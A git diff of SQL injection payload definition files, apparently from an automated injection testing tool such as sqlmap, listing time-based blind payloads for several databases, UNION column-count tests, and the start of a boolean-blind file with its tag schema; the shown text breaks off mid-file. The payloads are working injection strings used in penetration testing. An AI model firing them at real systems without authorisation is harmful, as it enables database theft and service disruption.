-            <dbms_version>&gt;= 5.0.11</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &lt; 5.0.12 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
-        <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL &gt; 8.1 time-based blind - GROUP BY and ORDER BY clauses</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))</vector>
-        <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-            <dbms_version>&gt; 8.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))</vector>
-        <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
-        <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
-        <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_LOCK.SLEEP)</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</vector>
-        <request>
-            <payload>,(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_PIPE.RECEIVE_MESSAGE)</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
-        <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
-        <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>HSQLDB &gt;= 1.7.2 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
-        <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>HSQLDB</dbms>
-            <dbms_version>&gt;= 1.7.2</dbms_version>
-        </details>
-    </test>    
-    
-    <test>
-        <title>HSQLDB &gt; 2.0 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</vector>
-        <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>HSQLDB</dbms>
-            <dbms_version>&gt; 2.0</dbms_version>
-        </details>
-    </test>
-    <!-- TODO: if possible, add payload for Microsoft Access -->
-    <!-- End of time-based blind tests - GROUP BY and ORDER BY clause -->
-
-
-    <!-- UNION query tests -->
-    <test>
-        <title>MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
-        <stype>3</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>[CHAR]</char>
-            <columns>[COLSTART]-[COLSTOP]</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>
-        <stype>3</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>NULL</char>
-            <columns>[COLSTART]-[COLSTOP]</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)</title>
-        <stype>3</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>[RANDNUM]</char>
-            <columns>[COLSTART]-[COLSTOP]</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL UNION query ([CHAR]) - 1 to 10 columns</title>
-        <stype>3</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>[CHAR]</char>
-            <columns>1-10</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL UNION query (NULL) - 1 to 10 columns</title>
-        <stype>3</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>NULL</char>
-            <columns>1-10</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL UNION query ([RANDNUM]) - 1 to 10 columns</title>
-        <stype>3</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>[RANDNUM]</char>
-            <columns>1-10</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL UNION query ([CHAR]) - 11 to 20 columns</title>
-        <stype>3</stype>
-        <level>2</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>[CHAR]</char>
-            <columns>11-20</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL UNION query (NULL) - 11 to 20 columns</title>
-        <stype>3</stype>
-        <level>2</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>NULL</char>
-            <columns>11-20</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL UNION query ([RANDNUM]) - 11 to 20 columns</title>
-        <stype>3</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>[RANDNUM]</char>
-            <columns>11-20</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL UNION query ([CHAR]) - 21 to 30 columns</title>
-        <stype>3</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>[CHAR]</char>
-            <columns>21-30</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL UNION query (NULL) - 21 to 30 columns</title>
-        <stype>3</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>NULL</char>
-            <columns>21-30</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL UNION query ([RANDNUM]) - 21 to 30 columns</title>
-        <stype>3</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>[RANDNUM]</char>
-            <columns>21-30</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL UNION query ([CHAR]) - 31 to 40 columns</title>
-        <stype>3</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>[CHAR]</char>
-            <columns>31-40</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL UNION query (NULL) - 31 to 40 columns</title>
-        <stype>3</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>NULL</char>
-            <columns>31-40</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL UNION query ([RANDNUM]) - 31 to 40 columns</title>
-        <stype>3</stype>
-        <level>5</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>[RANDNUM]</char>
-            <columns>31-40</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL UNION query ([CHAR]) - 41 to 50 columns</title>
-        <stype>3</stype>
-        <level>5</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>[CHAR]</char>
-            <columns>41-50</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL UNION query (NULL) - 41 to 50 columns</title>
-        <stype>3</stype>
-        <level>5</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>NULL</char>
-            <columns>41-50</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL UNION query ([RANDNUM]) - 41 to 50 columns</title>
-        <stype>3</stype>
-        <level>5</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>#</comment>
-            <char>[RANDNUM]</char>
-            <columns>41-50</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
-        <stype>3</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[CHAR]</char>
-            <columns>[COLSTART]-[COLSTOP]</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>
-        <stype>3</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>NULL</char>
-            <columns>[COLSTART]-[COLSTOP]</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)</title>
-        <stype>3</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[RANDNUM]</char>
-            <columns>[COLSTART]-[COLSTOP]</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([CHAR]) - 1 to 10 columns</title>
-        <stype>3</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[CHAR]</char>
-            <columns>1-10</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query (NULL) - 1 to 10 columns</title>
-        <stype>3</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>NULL</char>
-            <columns>1-10</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([RANDNUM]) - 1 to 10 columns</title>
-        <stype>3</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[RANDNUM]</char>
-            <columns>1-10</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([CHAR]) - 11 to 20 columns</title>
-        <stype>3</stype>
-        <level>2</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[CHAR]</char>
-            <columns>11-20</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query (NULL) - 11 to 20 columns</title>
-        <stype>3</stype>
-        <level>2</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>NULL</char>
-            <columns>11-20</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([RANDNUM]) - 11 to 20 columns</title>
-        <stype>3</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[RANDNUM]</char>
-            <columns>11-20</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([CHAR]) - 21 to 30 columns</title>
-        <stype>3</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[CHAR]</char>
-            <columns>21-30</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query (NULL) - 21 to 30 columns</title>
-        <stype>3</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>NULL</char>
-            <columns>21-30</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([RANDNUM]) - 21 to 30 columns</title>
-        <stype>3</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[RANDNUM]</char>
-            <columns>21-30</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([CHAR]) - 31 to 40 columns</title>
-        <stype>3</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[CHAR]</char>
-            <columns>31-40</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query (NULL) - 31 to 40 columns</title>
-        <stype>3</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>NULL</char>
-            <columns>31-40</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([RANDNUM]) - 31 to 40 columns</title>
-        <stype>3</stype>
-        <level>5</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[RANDNUM]</char>
-            <columns>31-40</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([CHAR]) - 41 to 50 columns</title>
-        <stype>3</stype>
-        <level>5</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[CHAR]</char>
-            <columns>41-50</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-    <test>
-        <title>Generic UNION query (NULL) - 41 to 50 columns</title>
-        <stype>3</stype>
-        <level>5</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>NULL</char>
-            <columns>41-50</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([RANDNUM]) - 41 to 50 columns</title>
-        <stype>3</stype>
-        <level>5</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[RANDNUM]</char>
-            <columns>41-50</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-    <!-- End of UNION query tests -->
-</root>
diff --git a/xml/payloads/01_boolean_blind.xml b/xml/payloads/01_boolean_blind.xml
new file mode 100644
index 000000000..19f2b1ce9
--- /dev/null
+++ b/xml/payloads/01_boolean_blind.xml
@@ -0,0 +1,1357 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<!--
+Tag: <test>
+    SQL injection test definition.
+
+    Sub-tag: <title>
+        Title of the test.
+
+    Sub-tag: <stype>
+        SQL injection family type.
+
+        Valid values:
+            1: Boolean-based blind SQL injection
+            2: Error-based queries SQL injection
+            3: Inline queries SQL injection
+            4: Stacked queries SQL injection
+            5: Time-based blind SQL injection
+            6: UNION query SQL injection
+
+    Sub-tag: <level>
+        From which level check for this test.
+
+        Valid values:
+            1: Always (<100 requests)
+            2: Try a bit harder (100-200 requests)
+            3: Good number of requests (200-500 requests)
+            4: Extensive test (500-1000 requests)
+            5: You have plenty of time (>1000 requests)
+
+    Sub-tag: <risk>
+        Likelihood of a payload to damage the data integrity.
+
+        Valid values:
+            1: Low risk
+            2: Medium risk
+            3: High risk
+
+    Sub-tag: <clause>
+        In which clause the payload can work.
+
+        NOTE: for instance, there are some payload that do not have to be
+        tested as soon as it has been identified whether or not the
+        injection is within a WHERE clause condition.
+
+        Valid values:
+            0: Always
+            1: WHERE / HAVING
+            2: GROUP BY
+            3: ORDER BY
+            4: LIMIT
+            5: OFFSET
+            6: TOP
+            7: Table name
+            8: Column name
+
+        A comma separated list of these values is also possible.
+
+    Sub-tag: <where>
+        Where to add our '<prefix> <payload><comment> <suffix>' string.
+
+        Valid values:
+            1: Append the string to the parameter original value
+            2: Replace the parameter original value with a negative random
+               integer value and append our string
+            3: Replace the parameter original value with our string
+
+    Sub-tag: <vector>
+        The payload that will be used to exploit the injection point.
+
+    Sub-tag: <request>
+        What to inject for this test.
+
+        Sub-tag: <payload>
+            The payload to test for.
+
+        Sub-tag: <comment>
+            Comment to append to the payload, before the suffix.
+
+        Sub-tag: <char>
+            Character to use to bruteforce number of columns in UNION
+            query SQL injection tests.
+
+        Sub-tag: <columns>
+            Range of columns to test for in UNION query SQL injection
+            tests.
+
+    Sub-tag: <response>
+        How to identify if the injected payload succeeded.
+
+        Sub-tag: <comparison>
+            Perform a request with this string as the payload and compare
+            the response with the <payload> response. Apply the comparison
+            algorithm.
+
+            NOTE: useful to test for boolean-based blind SQL injections.
+
+        Sub-tag: <grep>
+            Regular expression to grep for in the response body.
+
+            NOTE: useful to test for error-based SQL injection.
+
+        Sub-tag: <time>
+            Time in seconds to wait before the response is returned.
+
+            NOTE: useful to test for time-based blind and stacked queries
+            SQL injections.
+
+        Sub-tag: <union>
+            Calls unionTest() function.
+
+            NOTE: useful to test for UNION query (inband) SQL injection.
+
+    Sub-tag: <details>
+        Which details can be infered if the payload succeed.
+
+        Sub-tags: <dbms>
+            What is the database management system (e.g. MySQL).
+
+        Sub-tags: <dbms_version>
+            What is the database management system version (e.g. 5.0.51).
+
+        Sub-tags: <os>
+            What is the database management system underlying operating
+            system.
+
+    <test>
+        <title></title>
+        <stype></stype>
+        <level></level>
+        <risk></risk>
+        <clause></clause>
+        <where></where>
+        <vector></vector>
+        <request>
+            <payload></payload>
+            <comment></comment>
+            <char></char>
+            <columns></columns>
+        </request>
+        <response>
+            <comparison></comparison>
+            <grep></grep>
+            <time></time>
+            <union></union>
+        </response>
+        <details>
+            <dbms></dbms>
+            <dbms_version></dbms_version>
+            <os></os>
+        </details>
+    </test>
+-->
+
+<root>
+    <!-- Boolean-based blind tests - WHERE/HAVING clause -->
+    <test>
+        <title>AND boolean-based blind - WHERE or HAVING clause</title>
+        <stype>1</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [INFERENCE]</vector>
+        <request>
+            <payload>AND [RANDNUM]=[RANDNUM]</payload>
+        </request>
+        <response>
+            <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
+        </response>
+    </test>
+
+    <test>
+        <title>OR boolean-based blind - WHERE or HAVING clause</title>
+        <stype>1</stype>
+        <level>1</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>2</where>
